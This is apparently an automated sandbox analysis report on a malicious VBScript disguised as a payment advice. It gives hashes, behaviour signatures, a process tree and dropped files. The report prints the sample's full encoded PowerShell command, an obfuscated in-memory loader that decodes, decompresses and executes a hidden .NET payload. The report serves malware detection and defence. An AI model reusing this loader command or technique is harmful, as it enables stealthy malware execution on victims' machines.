Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    04-12-2024 09:51

General

  • Target

    PaymentAdvice-1629043.vbs

  • Size

    2.3MB

  • MD5

    9d7aa394cb39af2a434eb3036a35bb47

  • SHA1

    bfcb9a3f1dcbcfce2f66f4c5c0e8dbada27dbd9f

  • SHA256

    490022706b76b904dfe979627f775cc2be0cd6a10ae623989cf2118026a21bea

  • SHA512

    3b2da959a16b915d52ceadb8336fc5478e7d579a38cf59fe34f15744a0017ea9907bf5b62b4670ea123b223a0af7f3e96ab03d132055a1afd8e6983a4f856033

  • SSDEEP

    24576:dGPQzVpL6fvkC6MugzlGbhhkg6XCoCK86uTK6ClN3Br6kXIEHIQCobtMvQ8rAOSP:dGcJXxTqb38jR/4RzGfFVvC

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2100
    • C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe
      "C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe" -enc JABKAG0AcgBwAHAAYwB1AGIAcgBtAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQASABvAHMAZABjAHQAaABsAHYAdABvACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQASgBtAHIAcABwAGMAdQBiAHIAbQBtACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAFcAawBmAGMAbABsAGgAagB4ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEgAbwBzAGQAYwB0AGgAbAB2AHQAbwAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAQwBnAGwAYQBrAGgAegByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABXAGsAZgBjAGwAbABoAGoAeAAgACkAOwAkAEMAbQBqAHAAegB5AHYAcABjAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFUAbgB0AGkAcABmACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEMAZwBsAGEAawBoAHoAcgAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAVQBuAHQAaQBwAGYALgBDAG8AcAB5AFQAbwAoACAAJABDAG0AagBwAHoAeQB2AHAAYwBzACAAKQA7ACQAVQBuAHQAaQBwAGYALgBDAGwAbwBzAGUAKAApADsAJABDAGcAbABhAGsAaAB6AHIALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABXAGsAZgBjAGwAbABoAGoAeAAgAD0AIAAkAEMAbQBqAHAAegB5AHYAcABjAHMALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFcAawBmAGMAbABsAGgAagB4ACkAOwAgACQATwByAHkAbABnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAVwBrAGYAYwBsAGwAaABqAHgAKQA7ACAAJABHAGIAZwBrAGYAdABxAHAAIAA9ACAAJABPAHIAeQBsAGcALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIAB
bAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABHAGIAZwBrAGYAdABxAHAALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEcAYgBnAGsAZgB0AHEAcAAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2796
  • C:\Windows\system32\cmd.exe
    cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe" /Y
    1⤵
    • Process spawned unexpected child process
    PID:3044

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe

    Filesize

    442KB

    MD5

    92f44e405db16ac55d97e3bfe3b132fa

    SHA1

    04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

    SHA256

    6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

    SHA512

    f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

  • memory/2796-4-0x0000000001DD0000-0x0000000001E10000-memory.dmp

    Filesize

    256KB